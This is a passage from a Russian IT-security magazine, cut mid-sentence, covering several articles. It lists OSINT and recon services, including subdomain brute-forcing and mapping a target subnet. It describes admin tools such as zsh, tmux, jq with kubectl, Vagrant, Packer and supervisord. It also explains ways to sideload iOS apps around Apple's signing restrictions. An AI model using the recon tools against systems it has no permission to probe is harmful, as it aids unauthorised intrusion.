Сервисы­ и утилиты­ , созданные­ для анализа­ таких данных­ , как IP, SSID, метаданные­ файлов­ , DNS-записи, и всего­ , где объектом­ анализа­ выступа­ ­ет элемент­ IT-структуры­ , будь то сайт или IP-адрес.

Интерес­ ный­ вариант­ — это комбайн­ под названи­ ем­ Xinit.ru. Вот непол ­ ный список­ его возможнос­ ­тей:

•провер­ ка­ домена или IP-адреса­ по whois;

•получе­ ние­ снимков­ из Google-кеша и данных­ из веб архива­ ;

•сервисы­ и протоко­ лы­ на сервере­ ;

•HTTP-заголовки­ ответа­ ;

•ссылки­ со страниц­ сайта­ на хосте­ ;

•email-адреса­ домена;

•провер­ ка­ сайта­ на virustotal.com;

•показ­ реального­ IP-адреса­ за Cloudfare;

•DNS-инфраструктура­ сайта­ .

Urlscan.io проверя­ ет­ , кому выдан TLS-сертификат­ и какие IP-адреса­ связаны­

с сайтом­ , а также­ определя­ ет­ стек технологий­ на сайте­ .

Wigle может показать SSID и BSSID хотспо­ тов­ Wi-Fi на карте­ , также­ позволя­ ет­

искать по ним.

PublicWWW отличает­ ­ся тем, что ищет по исходному­ коду страниц­ . Находит

никней­ мы­ , упомина­ ния­ в коде, сопоставля­ ет­ значки­ сайтов­ , что позволя­ ет­ искать двойники­ ; находит любые схожие­ упомина­ ния­ идентифика­ торов­ или фраз, кошельков­ , токенов, позволя­ ет­ также­ находить поставщи­ ков­ рек ­ ламных виджетов­ и многое­ другое­ в таком духе.

Пример­ поиска­ сайта­ «Хакера»

При помощи Metadata2Go можно­ увидеть­ все метаданные­ файла­ .

Jeffrey’s Image Metadata Viewer извлекает­ EXIF из фотографий­ и кар ­

тинок.

PDFCandy дает возможность­ извлекать­ и изменять­ метаданные­ PDF — нап ­

ример, название­ , авторов­ и дату создания­ .

HostHunter ищет доменные­ имена­ для набора IP-адресов­ . Это полезно­ , ког ­

да нужно­ быстро­ провес­ ти­ разведку­ в целевой подсети­ . На The Standof 2021 это очень пригож­ далось­ моей команде­ !

HostHunter

Сервис­ весьма­ удобен­ при обработ­ ­ке больших­ списков­ IP-адресов­ . Есть воз ­ можность экспорта­ результатов­ в CSV или обычный­ тексто­ ­вый файл.

Knock Subdomain Scan при помощи брутфорса­ перебирает­ субдомены­

на целевом домене и может генерировать­ выходной­ файл с результатами­ .

ИТОГИ

«Ищите­ , и обрящете­ », — гласит­ древняя­ мудрость­ . Если что то хоть раз попало в интернет — оно останет­ ся­ там навсегда­ . Вопрос­ только­ в том, какими усилиями­ получится­ это найти­ .

Сегод­ ­ня мы рассмот­ ­рели полезные­ сервисы­ в первую­ очередь­ с упором­ на доступность­ (читай: бесплат­ ­ность). Конечно­ , мы могли­ незаслужен­ ­но упус ­ тить что то важное­ , но не суди строго­ — коммента­ ­рии находятся­ внизу­ , и там можно­ дополнить­ эту статью чем нибудь полезным­ .

МАЛЕНЬКИЕ ХИТРОСТИ И БОЛЬШИЕ ИНСТРУМЕНТЫ

НА КАЖДЫЙ ДЕНЬ

ZSH

Начнем­ с самого часто­ используемо­ го­ инстру­ мен­ та­ — интерпре­ тато­ ра­ командной­ строки­ . Я использую­ zsh — из за плагинов­ , тем и возможнос­ тей­ автодопол­ нения­ . Автодопол­ нение­ из истории­ сильно­ сокраща­ ет­ время­ набора команд, а плагины­ еще больше­ расширя­ ют­ автодопол­ нение­ , обес ­ печивают­ подсвет­ ку­ синтакси­ са­ , добавляют­ полезные­ алиасы­ .

Два наиболее­ полезных­ плагина­ :

•git — отобража­ ­ет ветки­ /коммиты­ /репозитории­ . Наглядно­ видно­ , в каком репозитории­ находишься­ , инициали­ ­зиро­ван ли он, какая ветка­ , коммит­ , синхро­ ­низи­рова­но ли с удален­ ­ным репозитори­ ­ем и прочее­ ;

•zsh-syntax-highlighting — подсвет­ ­ка синтакси­ ­са в консоли­ . Удобно­ при написании­ и отладке скриптов­ .

Подсвет­ ка­ веток в Git

Также­ рекомендую­ установить­ плагины­ для каждоднев­ ­но используемых­ инс ­

трумен­ ­тов: AWS, Docker, brew, knife, node, encode64, kubectl, osx, Python, pip.

Практичес­ ки­ все добавляют­ подсказ­ ки­ по табу, что уже очень полезно­ , некоторые­ по этому­ же табу стучат­ ся­ в API сервисов­ и предлага­ ют­ расширен­ ­ ное автодопол­ нение­ , а не только­ возможные­ команды­ .

Плагины­ AWS и kubectl делают­ еще одну важную­ вещь — всегда­ показы ­ вают контекст­ /профиль­ , в котором работаешь­ , и сильно­ снижают­ шансы­ оши ­ биться­ и вкинуть­ какую нибудь опасную­ команду­ не в тот терминал­ . Плюс, к примеру­ , расширение­ для амазона­ умеет­ считывать­ назначен­ ­ные профилям­ цвета­ , и, если будешь работать в проде­ , можно­ подкра­ ­сить профиль­ ярко красным­ , чтобы­ точно­ понимать, где выполняет­ ­ся команда­ .

Подсвет­ ка­ профиля­ AWS

Подсвет­ ка­ профиля­ kubectl

Хорошая­ тема: powerlevel10k, гибкая­ , красивая­ , информатив­ ­ная, можно­ нас ­ троить­ по вкусу­ очень много­ вещей. Особен­ ­но удобен­ сквош исполненных­ команд после­ выполнения­ , чтобы­ не засорять экран.

Плагины­ , как и темы, установить­ довольно­ просто­ . Если заморачивать­ ­ся — для этого­ есть плагин­ /пакет менеджеры­ для zsh вроде­ antigen или Zinit. Но в целом установ­ ­ка сводит­ ­ся к git clone и запуску­ скрипта­ , который сам все настро­ ит­ . Для поиска­ плагинов­ лучше­ всего­ использовать­ подборки­ на GitHub

вроде­ awesome-zsh-plugins.

SCREEN И TMUX

Screen — это эмулятор­ (а точнее­ , мультип­ лексор­ ) терминаль­ ных­ сессий­ VT100. Но обычно­ его используют­ как способ­ безопасно­ выполнить­ команды­ через SSH на случай­ прерыва­ ния­ соединения­ .

К примеру­ , ты запускаешь­ «долгоиг­ ­рающую» команду­ вроде­ apt-get upgrade и в этот момент соединение­ с сервером­ обрывает­ ся­ . В итоге­ дочер ­ ний процесс­ apt-get-сессии­ SSH умирает­ и процесс­ обновления­ пакетов останав­ ­лива­ется. Чтобы­ этого­ не произош­ ­ло, просто­ запусти­ screen и уже в нем запускай­ все нужные­ команды­ . Теперь, если соединение­ оборвется­ , родительский­ процесс­ screen останет­ ­ся жив и не только­ позволит­ команде­ коррек­ ­тно завершить­ ­ся, но и позволит­ заново подклю­ ­чить­ся к существу­ ­ющей сессии­ , причем­ неважно­ , с какого устройства­ .

Screen позволя­ ет­ запускать­ множес­ тво­ терминалов­ в рамках­ одной SSHсессии­

У Screen есть более современ­ ная­ альтер­ натива­ под названи­ ем­ tmux. Ее раз ­ работали­ парни­ из OpenBSD, и в целом она отличает­ ся­ более высокой про ­ изводитель­ ностью­ и наличием­ различных­ современ­ ных­ плюшек­ , вроде­ под ­ держки­ плагинов­ . Сразу­ рекомендую­ установить­ плагин­ tmux-resurrect, поз ­ воляющий­ сохранить­ текущий набор открытых­ в tmux терминалов­ в файл и восста­ новить­ его, когда­ понадобит­ ся­ выполнить­ схожую­ задачу.

JQ

Взаимо­ ­дей­ствие с вебом и облачными­ инфраструктурами­ по большей­ части­ идет в формате­ JSON. Kubectl и многие­ другие­ инстру­ ­мен­ты также­ умеют­ выводить данные­ в JSON. Поэтому­ нам нужен JSON-процес­ ­сор, и лучший­

из них — это jq. Очень удобный­ инстру­ мент­ с развитым­ синтакси­ сом­ и дос ­ таточной­ гибкостью­ , чтобы­ писать сложные­ вложен­ ные­ запросы­ и условия­ .

В man json можно­ найти­ полную­ документацию­ с хорошими­ примера­ ­ми использования­ , да и в целом инстру­ мент­ настоль­ ко­ популярен­ , что примеры­ есть практичес­ ки­ для любой задачи. Далее несколь­ ко­ примеров­ работы с Kubernetes.

Посмотреть­ выставлен­ ­ные переменные­ окружения­ в контей­ ­нерах:

$ kubectl get pods --all-namespaces -o json | jq '.items[].spec.

containers[].env[]?'

Поиск­ поврежден­ ных­ деплой­ мен­ тов­ :

$ kubectl get --raw=/apis/apps/v1/deployments | jq '.items[] | {

name: .metadata.name, replicas: .status.replicas, available: (.

status.availableReplicas // 0), unavailable: (.status.

unavailableReplicas // 0)} | select (.unavailable > 0)'

Быстро­	посмотреть­		, какие	образы­ доступны­			на нодах (часто­ помогает­
при проблеме­		с кешировани­		ем­ и скачива­	нием­	образов­ новых версий­ ):

$ kubectl get nodes -o json | jq '.items[] | .status .images[]'`

Схоже­ с предыду­ ­щей, вариант­ быстро­ ­го просмотра­ доступных­ ресурсов­ на нодах, удобно­ пользовать­ ­ся в связке­ со скриптами­ :

$ kubectl get nodes -o json | jq '.items[] | .status .allocatable'

K9S И K8S LENS

K9s — консоль­ ­ный менеджер­ для Kubernetes. Легкий­ , быстрый­ , поддержи­ ­вает все способы­ авториза­ ­ции в кубере, включая­ SSO и aws-iam-auth. Позволя­ ­ет быстро­ и наглядно­ перемещать­ ­ся по кластеру­ , редактировать­ манифесты­ и ресурсы­ , заходить в контей­ ­неры, смотреть­ загрузку­ ресурсов­ .

Из минусов — нет «вкладок­ », а соответс­ твен­ но­ , возвра­ та­ к открытым­ ресурсам­ . Но в любом случае­ работать с кластером­ через K9s ощутимо­ удоб ­ нее, чем через kubectl, даже если написать для последне­ ­го много­ алиасов­ .

Отображение­ подов в K9s

Провер­ ка­ манифестов­ ресурса­ в K9s

K8s lens — отдельное­ десктоп­ ное­ приложе­ ние­ (на самом деле написанное­

на электро­ не­ ). Показывает­ кластер­ в еще более красивом­ виде. По воз ­ можностям­ пример­ но­ равен K9s. Из минусов — не все методы авториза­ ции­ поддержи­ вают­ ся­ . Есть довольно­ большая­ библиоте­ ка­ плагинов­ .

Общий­ вид K8s lens

VAGRANT

Vagrant — ощутимо­ потерявший­ в популярности­ , но все еще часто­ полезный­ инстру­ мент­ управления­ виртуаль­ ными­ машинами­ . Основное достоинс­ тво­ Vagrant — удобная­ и легкая­ (в плане­ конфигура­ ции­ ) оркестра­ ция­ виртуаль­ ных­ машин, позволя­ ющая­ создавать­ универ­ саль­ ные­ тестовые­ среды­ для любых целей.

К примеру­ , чтобы­ настро­ ­ить образы­ виртуаль­ ­ных машин на этапе­ сборки­ , я использую­ Ansible. Но каждый­ раз для тестовых­ прогонов­ подклю­ ­чать­ся к сер ­ верам, будь то облачные или локальные­ Hyper-V/VMware/QEMU, может быть проблематич­ ­но, сложно­ и затратно­ по времени­ . Лучше­ написать простую­ кон ­ фигурацию­ для Vagrant, который по vagrant up будет прогонять­ запуск плей ­ бука Ansible на локальном­ VirtualBox. Это намного­ быстрее­ и проще­ , чем с использовани­ ем­ удален­ ного­ сервера­ .

Пример­ тестового­ конфига­ с Ansible-provisioner:

Vagrant.configure("2") do |config|

config.vm.box = "bento/ubuntu-18.04"

config.vm.provider "virtualbox" do |vtx|

vtx.cpus = "4"

vtx.memory = "4096"

end

config.vm.provision "ansible" do |ansible|

ansible.playbook = "/home/alex/work/${PROJECT}/playbook.yaml"

ansible.extra_vars = "testing_vars.yml"

ansible.vault_password_file="testing_password.txt"

end

end

PACKER

Для итоговой­ сборки­ образов­ виртуаль­ ­ных машин я использую­ Packer. Это часть стека­ Hashicorp (тех же ребят, кто написал Vagrant), поэтому­ кон ­ фигурация­ для запуска­ Ansible схожа­ и очень легко­ переносит­ ­ся из Vagrant

в Packer.

Так же как и в Vagrant, используя­ Ansible-provisioner, запускаем­ такую же конфигура­ ­цию в процес­ ­се сборки­ AMI:

build {

sources = [

"source.aws.ami_example"

]

provisioner "ansible" {

playbook_file = "/home/alex/work/${PROJECT}/playbook.yaml"

extra_arguments = [

"--extra-vars=prod_vars.yml",

"--vault-password-file=testing_password.txt"

]

}

}

SUPERVISORD

В продак­ ­шене каждый­ контей­ ­нер должен­ быть ответствен­ ­ным за выполнение­ только­ одного­ процес­ ­са (это правило­ хорошего­ тона). Для тестов­ же часто­ , помимо основного­ процес­ ­са (например­ , бэкенда­ какого то приложе­ ­ния), требует­ ­ся запустить­ еще и реверс прокси­ , базу или какой то дополнитель­ ­ный процесс­ для мониторин­ ­га и тестов­ .

Как раз здесь и пригодит­ ся­ Supervisord. Он будет запускать­ и мониторить­ несколь­ ко­ процес­ сов­ , а его конфиг­ проще­ , чем дополнитель­ ный­ докерфайл­ , и быстрее­ , чем сборка­ двух трех образов­ . Разумеется­ , в продак­ шене­ такое лучше­ не использовать­ , так как это идет вразрез­ с основной концепци­ ей­ докера.

Сам конфиг­ супервизора­ для тестирова­ ­ния работы прокси­ к бэкенду­ выг ­ лядит пример­ ­но так:

[supervisord]

loglevel=info

pidfile=/tmp/supervisord.pid

user=root

[rpcinterface:supervisor]

supervisor.rpcinterface_factory = supervisor.rpcinterface:

make_main_rpcinterface

[supervisorctl]

serverurl=unix:///dev/shm/supervisor.sock

[program:backend]

command = /bin/python /app/backend/main.py

autostart=true

autorestart=true

stdout_events_enabled=true

stderr_events_enabled=true

stdout_logfile=/dev/stdout

stderr_logfile=/dev/stderr

stopsignal=QUIT

[program:nginx]

command=/usr/sbin/nginx -g "daemon off; error_log /dev/stdout debug;"

autostart=true

stdout_events_enabled=true

stderr_events_enabled=true

stdout_logfile=/dev/stdout

stderr_logfile=/dev/stdout

stopsignal=QUIT

И сам докерфайл­ с точкой­ входа­ под супервизор­ :

FROM base-image:latest

COPY ./nginx /etc/nginx

ENTRYPOINT ["/usr/bin/supervisord"]

CMD ["-n", "-c", "/etc/supervisord.conf"]

ЛОГИНЫ И ПАРОЛИ

Возможно­ , ты уже используешь­ менеджеры­ паролей вроде­ LastPass, KeePass, 1Password или Dashlane. Может быть, в твоей­ организа­ ции­ они используют­ ся­ на корпоратив­ ном­ уровне­ . Но ты мог не знать, что у всех этих менеджеров­ есть чертов­ ски­ удобные­ консоль­ ные­ версии­ .

С их помощью можно­ сделать­ врапперы­ для авториза­ ­ции в облачных сис ­ темах, быстро­ подстав­ ­лять токены в curl или даже встроить­ это как сорс сек ­ ретов в пайплай­ ­ны вместо­ использования­ системы­ вроде­ Hashicorp Vault.

Корот­ кий­ алиас­ , позволя­ ющий­ получить по имени­ хранили­ ща­ и ключу­ нуж ­

ное значение­ . К примеру­ , op-value Engineering console-pass:

alias op-value=function(){op list items --vault $1 | jq --arg v $2 -r

'.[] | select(.overview.title | contains($v)) | .uuid'}

Быстрый­ просмотр­ и поиск нужного­ айтема­ , сразу­ можно­ копировать­ UUID, чтобы­ получить нужное­ значение­ :

alias op-list-items=function(){op list items --vault $1 | jq -r '.[]

| .uuid, .overview.title' | less

В качестве­ альтер­ нативы­ можно­ использовать­ простей­ ший­ консоль­ ный­ менеджер­ паролей pass, который работает­ полностью­ локально­ (с воз ­ можностью хранения­ в Git). Его хранили­ ще­ удобно­ перебрасывать­ в случае­ необходимос­ ти­ , так как оно представ­ ляет­ собой набор файлов­ , зашифрован­ ­ ных с помощью GPG.

Мелким­ бонусом — fzf, визуаль­ ­ный динамичес­ ­кий поиск по названи­ ­ям фай ­ лов и путей в каталогах­ . Отдает­ в консоль­ полный­ путь до файла­ , так что удоб ­ но использовать­ в связке­ с алиасом­ alias vzf='vim $(fzf)'. В итоге­ получается­ инстру­ ­мент для быстро­ ­го редактирова­ ­ния файлов­ в текущей директории­ без запуска­ тяжелых блокнотов­ .

ВЫВОДЫ

Для каждой­ задачи, рутинной­ или не очень, можно­ найти­ свое решение и внедрить­ его в повседнев­ ­ное использование­ . Так, плагины­ для zsh ста ­ новятся­ ежедневны­ ­ми помощниками­ , Vagrant и Supervisord помогают­ эко ­ номить время­ на запусках­ тестов­ , а менеджеры­ паролей, несмотря­ на свою пользователь­ ­скую природу­ , отлично интегрируют­ ­ся в облачную инфраструк ­ туру. Главное­ в любой рутинной­ задаче — чтобы­ в следующий­ раз ее можно­ было сделать­ быстрее­ .

Экосис­ тему­

Apple недаром называют­ «огорожен­

ным­

садом»:

компания­

жестко­

контро­ лиру­

ет­ ,

что пользователь­

может,

а чего не может делать со своими­

устройства­

ми­ . В случае­

с iOS и iPadOS этот контроль­

достига­ ет­ абсурдных­

масшта­ ­

бов, когда­ законный­

владелец­

устройства­

теряет­ воз ­

можность устанав­ ливать­

приложе­

ния­ в обход модерируемо­

­

го и цензуриру­ емо­ го­ магазина­ приложе­ ний­ . В этой статье мы рассмот­ рим­ способы­ снятия­ этого­ ограниче­ ния­ , от самых простых­ , «в один клик», до сложных­ , но надежных­ .

ПОЧЕМУ НЕЛЬЗЯ ПРОСТО УСТАНОВИТЬ ПРИЛОЖЕНИЕ

На современ­ ных­ мобильных­ платформах­ можно­ запускать­ только­ код, под ­ писанный­ цифровой­ подписью­ . Но если в Android можно­ залить пакет при ­ ложения­ , подписан­ ный­ обычным­ цифровым­ сертифика­ том­ , то в iOS ситуация­ сложнее­ : пакет подписыва­ ется­ в момент установ­ ки­ , а уникаль­ ная­ для каждого­ устройства­ цифровая­ подпись­ разреша­ ет­ запускать­ его лишь на том устрой ­ стве, для которого­ она была создана­ .

Добавим­ сюда тот факт, что цифровые­ подписи­ в одно лицо выдает­ (а может и отозвать­ !) только­ сама компания­ Apple, и получим ситуацию­ , в которой никакой неподписан­ ­ный (точнее­ — подписан­ ­ный «неправиль­ ­ной» цифровой­ подписью­ ) код на устройстве­ выполнять­ ­ся не может.

ОФИЦИАЛЬНЫЙ ПУТЬ: АККАУНТ РАЗРАБОТЧИКА

Самый­ простой­ и единствен­ но­ честный­ путь решения этой проблемы­ — офи ­ циальный­ . При желании приложе­ ния­ все таки можно­ устанав­ ливать­ , минуя App Store, но путь этот тернист­ , а для обычного­ пользовате­ ля­ просто­ недос ­ тупен.

Один из таких способов­ — различные­ варианты­ корпоратив­ ­ной и спе ­ циальной­ дистри­ ­буции. Так, в случае­ с корпоратив­ ­ной дистри­ ­буци­ей клиент­ (образова­ ­тель­ное учреждение­ или крупная­ компания­ — например­ , тран ­ спортная) регистри­ ­рует корпоратив­ ­ную учетную­ запись, получая возможность­ самостоятель­ ­но подписывать­ пакеты приложе­ ­ний и рассылать­ их на кор ­

поративные­ устройства­ через MDM (Mobile Device Management).

Для подписи­ использует­ ­ся специаль­ ­ный enterprise-сертификат­ , срок дей ­ ствия которого­ , как правило­ , ограничен­ одним годом, зато отсутству­ ­ют огра ­ ничения­ на число­ подписыва­ ­емых им приложе­ ­ний. При первом­ запуске­ под ­ писанного­ таким сертифика­ ­том приложе­ ­ния пользовате­ ­лю (если его устрой ­ ство не было заранее настро­ ­ено компани­ ­ей владель­ ­цем) нужно­ будет открыть настрой­ ­ки и добавить сертификат­ в список­ доверенных­ . В этот момент устройство­ свяжет­ ­ся с сервером­ Apple, который и выдаст (или не выдаст; об этом — ниже) разрешение­ на это действие­ .

Вчем подвох­ ? Их сразу­ несколь­ ­ко. Во первых­ , в программе­ корпоратив­ ­ ной дистри­ ­буции могут участво­ ­вать организа­ ­ции, но не частные­ лица. Во вто ­ рых, участие­ в программе­ платное­ . Наконец, мы не выходим из под контро­ ­ля Apple; компания­ по прежнему­ сохраня­ ­ет контроль­ над тем, разрешить­ ли запуск приложе­ ­ния на конкрет­ ­ном устройстве­ . Если Apple покажется­ , что выданный­ организа­ ­ции enterprise-сертификат­ использует­ ­ся с нарушением­ лицензион­ ­ного соглашения­ , этот сертификат­ будет моменталь­ ­но отозван­

иподписать­ с его помощью вновь устанав­ ­лива­емые приложе­ ­ния не удастся­ . Подобные­ сертифика­ ­ты регулярно­ «утекают­ » и используют­ ­ся различны­ ­ми «альтер­ ­натив­ными магазинами­ приложе­ ­ний» для подписи приложе­ ­ний.

Вариация­ на ту же тему — специаль­ ­ная дистри­ ­буция для участни­ ­ков прог ­ раммы Apple для разработ­ ­чиков. Ее основное предназна­ ­чение — тестирова­ ­ ние разработ­ ­чиками программ­ собствен­ ­ного производс­ ­тва на своих­ же устройствах­ ; соответс­ ­твен­но, для ее использования­ нужна­ учетная­ запись разработ­ ­чика (Apple Developer Account). В рамках­ специаль­ ­ной дистри­ ­буции возможно­ пакетирова­ ­ние: одну и ту же сборку­ можно­ подписать­ сразу­ для сотни­ устройств­ .

У этого­ способа­ есть как несомненные­ преиму­ ­щес­тва, так и недостатки­ в сравнении­ с методом корпоратив­ ­ной дистри­ ­буции.

Вдостоинс­ ­тва запишем в первую­ очередь­ то, что приложе­ ­ние просто­ устанав­ ­лива­ется и запускает­ ­ся; нет необходимос­ ­ти подтверждать­ сер ­ тификат, как нет и необходимос­ ­ти каждый­ раз для установ­ ­ки приложе­ ­ния свя ­ зываться­ с сервером­ Apple. Отсюда­ следует­ возможность­ установить­ при ­ ложение­ на iPhone, у которого­ отсутству­ ­ет подклю­ ­чение к сети, — в пол ­ ностью офлайновом­ режиме.

Второе­ достоинс­ ­тво метода — это его доступность­ для обычного­ поль ­ зователя­ . Всего­ 99 долларов­ в год — и ты можешь открыть собствен­ ­ную учет ­ ную запись разработ­ ­чика, которая позволит­ тебе устанав­ ­ливать любые при ­ ложения­ на устройства­ числом­ до ста штук!

Так, а это точно­ «достоинс­ ­тво»? 99 долларов­ в год — это немало всего­ лишь за право­ устанав­ ­ливать собствен­ ­ные приложе­ ­ния на собствен­ ­ный iPhone, да и сто устройств­ — это за целый год: удаление­ ранее зарегистри­ ­ рованного­ устройства­ из учетной­ записи не высвобож­ ­дает один из ста сло ­ тов.

Еще один недостаток­ официаль­ ­ного способа­ — жесткая­ привяз­ ­ка дистри­ ­ буции к среде­ разработ­ ­ки Xcode, для работы которой, в свою очередь­ , пот ­ ребуется­ компьютер­ с macOS. Получается­ сложновато­ и дороговато­ , если у тебя случай­ ­но нет Mac.

Наконец­ , последний­ недостаток­ метода — открыть учетную­ запись для разработ­ ­чика частно­ ­му лицу непросто­ из за рогаток, установ­ ­ленных Apple. Об использовании­ одноразо­ ­вых Apple ID можно­ забыть: Apple верифи ­ цирует­ данные­ и может отказать­ в регистра­ ­ции без объясне­ ­ния причин­ . Наши разработ­ ­чики говорят, что неплохие­ шансы­ получить аккаунт­ при исполь ­

зовании ненового­

Apple

ID, в котором

указан­

реальный­

адрес

(тот же,

к которому­ привяза­

на­ платеж­ ная­

карта­ ); регистри­ ровать­

ся­ лучше­ с мака,

а наличие истории­

покупок с этой же учетной­

записи еще повышает­ шансы­ .

Несмотря­

на это, гарантии­

того, что учетную­

запись в программе­

для раз ­

работчиков­

зарегистри­ руют­

, нет; отказыва­

ют­ обычно­ без указания­

причин­ .

На этом официаль­

ные­

способы­

заканчива­

ются­

и начинаются­

полуофи­ ­

циальные­ .

ПОЛУОФИЦИАЛЬНЫЙ ПУТЬ: CYDIA IMPACTOR

Полуофи­ циаль­ ный­ способ­ — использование­ все той же официаль­ ной­ учетной­ записи для разработ­ чиков­ , но для подписи­ пакета вместо­ Xcode будем использовать­ приложе­ ние­ Cydia Impactor. Чем это лучше­ Xcode? Во первых­ , проще­ . В Xcode нужно­ задавать массу­ полей, создавать­ профиль­ , экспор ­ тировать сертификат­ — квест достаточ­ но­ запутанный­ даже для настоящих­ разработ­ чиков­ . Cydia Impactor позволя­ ет­ просто­ взять и залить приложе­ ние­

на iPhone, не требуя­ ничего, кроме­ логина и пароля от аккаунта­ разработ­ ­чика. Во вторых­ , в отличие­ от Xcode и многих­ альтер­ ­натив­ных решений, Cydia Impactor доступен­ для множес­ ­тва платформ­ , включая­ macOS, Windows и Linux.

Недос­ таток­ один: требует­ ся­ учетная­ запись Apple ID, зарегистри­ рован­ ная­

в программе­ Apple для разработ­ ­чиков. Если такой аккаунт­ у тебя есть, то про ­ цедура­ достаточ­ ­но проста­ , но к ней нужно­ подготовить­ ­ся — создать­ в учетной­ записи Apple ID так называемый­ пароль­ приложе­ ­ния.

Итак, метод установ­ ­ки приложе­ ­ния с использовани­ ­ем аккаунта­ разработ­ ­

чика и Cydia Impactor:

1.Подклю­ ­чаем iPhone к компьюте­ ­ру, устанав­ ­лива­ем доверенную­ связь (под ­ тверждаем­ запрос­ «Trust this computer?» на iPhone и вводим­ код блокиров­ ­ ки экрана­ ).

2.Запус­ ­каем Cydia Impactor.

3.Бросаем­ на окно Cydia Impactor файл IPA устанав­ ­лива­емо­го приложе­ ­ния.

4.Вводим­ логин и «пароль приложе­ ­ния» от Apple ID (обязатель­ ­но зарегис ­ трирован­ ­ного в программе­ Apple для разработ­ ­чиков).

5.Если­ Apple ID зарегистри­ ­рован более чем в одной программе­ для раз ­ работчиков­ , выбираем­ нужную­ .

6.Подтвержда­ ­ем запрос­ , и Cydia Impactor подпишет­ IPA и передаст его на устройство­ .

7.Все, приложе­ ­нием можно­ пользовать­ ­ся!

Способ­ коррек­ тный­ . Однако­ хотелось бы того же самого, но с использовани­ ­ ем обычного­ Apple ID. Как ни странно­ , это возможно­ , но с рядом ограниче­ ­ ний.

ИДЕМ В СЕРУЮ ЗОНУ: ПОДПИСЬ ПАКЕТА ОБЫЧНЫМ APPLE ID

Итак, ты решил подписать­ пакет приложе­ ­ния обычным­ Apple ID, не зарегис ­ трирован­ ­ным в программе­ Apple для разработ­ ­чиков. До 2019 года эта опция была хоть и не широко известной­ , но вполне­ работоспособ­ ­ной с учетом­ некоторых­ ограниче­ ­ний: подписан­ ­ное таким образом­ приложе­ ­ние работало­ только­ семь дней, а установить­ на одно устройство­ можно­ было не более трех подписан­ ­ных персональ­ ­ными сертифика­ ­тами приложе­ ­ний. Три года назад в Apple решили прикрыть­ этот способ­ установ­ ­ки, но сделали­ это не до конца­ . Оставшаяся­ лазейка­ , впрочем­ , работает­ только­ на компьюте­ ­рах с macOS. Соответс­ ­твен­но, если у тебя есть Mac, то ты можешь попробовать­ одно из следующих­ приложе­ ­ний.

Nullximpactor

Nullximpactor — фактичес­ ­ки альтер­ ­натива Cydia Impactor, работающая­ только­ на macOS, но позволя­ ­ющая использовать­ для подписи­ обычные­ учетные­ записи.

Разработ­ чик­ @nullx рекомендует­ использовать­ для подписи­ одноразо­ вые­ Apple ID без двухфактор­ ной­ аутентифика­ ции­ . В против­ ном­ случае­ тебе при ­ дется­ создать­ в своей­ учетной­ записи «пароль приложе­ ния­ ».

Достоинс­ тва­ : после­ начальной­ настрой­ ­ки использовать­ достаточ­ но­ просто­ .

Недос­ ­татки: только­ macOS; требует­ ­ся начальная­ настрой­ ­ка AltDeploy (инструк­ ­ция); остаются­ все ограниче­ ­ния персональ­ ­ной учетной­ записи (при ­ ложение­ будет работать не дольше­ семи дней, а установить­ можно­ не более трех приложе­ ­ний).

Nullximpactor

iOS App Signer

iOS App Signer — интерес­ ное­ решение, принципи­ аль­ но­ отличающееся­

от всех остальных­ программ­ подобного­ назначения­ . iOS App Signer исполь ­ зует для подписи­ приложе­ ­ний штатную­ среду­ разработ­ ­ки Xcode, обходя­ при этом требова­ ­ние учетной­ записи разработ­ ­чика (впрочем­ , семидневное­ ограниче­ ­ние или ограниче­ ­ние на число­ установ­ ­ленных таким образом­ при ­ ложений­ разработ­ ­чикам обойти­ не удалось­ ).

Пользовать­ ­ся iOS App Signer достаточ­ ­но сложно­ , но на GitHub есть под ­ робные инструк­ ­ции.

Достоинс­ тва­ : оригиналь­ ный­ метод, не требующий­ установ­ ки­ AltDeploy. Недос­ ­татки: только­ macOS; нужен Xcode; сложно­ настра­ ­ивать; огра ­

ничения­ персональ­ ­ной учетной­ записи.

iOS App Signer

ALTDEPLOY И ALTSTORE

AltStore — интерес­ ­ный и распростра­ ­нен­ный способ­ для установ­ ­ки неофи ­ циальных­ приложе­ ­ний и эмулято­ ­ров на устройства­ с iOS без джейлбрей­ ­ка.

Синструк­ ­циями по установ­ ­ке можно­ ознакомить­ ­ся на сайте­ проекта­ .

Всравнении­ с описан­ ­ными ниже онлайновыми­ магазинами­ приложе­ ­ний AltStore действи­ ­тель­но достой­ ­ная альтер­ ­натива. Ты можешь лично­ прокон­ ­ тролиро­ ­вать происхожде­ ­ние пакета IPA, а подписан­ он будет твоим­ собствен­ ­ ным персональ­ ­ным сертифика­ ­том, который Apple внезап­ ­но не аннулиру­ ­ет, как это часто­ происхо­ ­дит с сервисами­ типа IPWind и альтер­ ­натив­ными магазинами­ приложе­ ­ний, описан­ ­ными ниже.

Установ­ ка­ AltStore

Недос­ татков­ у этого­ решения тоже хватает­ . Во первых­ , все минусы пер ­ сональных­ сертифика­ тов­ : ограниче­ ние­ на число­ установ­ ленных­ приложе­ ний­ (не более трех) и время­ их работы (не более семи дней). Во вторых­ , необ ­ ходимость установ­ ки­ и настрой­ ки­ как приложе­ ния­ iTunes с включен­ ной­ син ­ хрониза­ цией­ через Wi-Fi, так и серверной­ части­ AltServer (которая будет использовать­ ся­ , чтобы­ автомати­ чес­ ки­ переподписывать­ установ­ ленные­ при ­ ложения­ каждые­ семь дней).

Стоят­ ли усилия­ того, чтобы­ установить­ на устройство­ до трех сторон­ них­ утилит­ ? Здорово­ сомнева­ юсь­ . А вот совмес­ тно­ с учетной­ записью разработ­ ­ чика это уже вполне­ может иметь смысл для установ­ ки­ приложе­ ний­ , которых нет и не будет в официаль­ ном­ App Store.

AltDeploy — фактичес­ ­ки форк решения AltStore. В отличие­ от AltStore,

который устанав­ лива­ ется­ на само устройство­ с iOS, AltDeploy позволя­ ет­ уста ­ новить и подписать­ приложе­ ние­ непосредс­ твен­ но­ с компьюте­ ра­ . При этом требует­ ся­ компьютер­ с macOS и традици­ онные­ для AltServer прыжки­ по коч ­ кам. Подробные­ инструк­ ции­ по установ­ ке­ — здесь.

AltDeploy

ПОДПИСЬ В РЕЖИМЕ ОНЛАЙН

Сущес­ тву­ ют­ бесплат­ ные­ сервисы­ , позволя­ ющие­ подписать­ пакет приложе­ ния­ в режиме онлайн, без связи­ устройства­ с компьюте­ ром­ . Пример­ такого сер ­

виса — IPASign.

Сервис­ IPASign

Помимо­ собствен­ ­но файла­ IPA, сервис­ просит­ предос­ ­тавить сертификат­

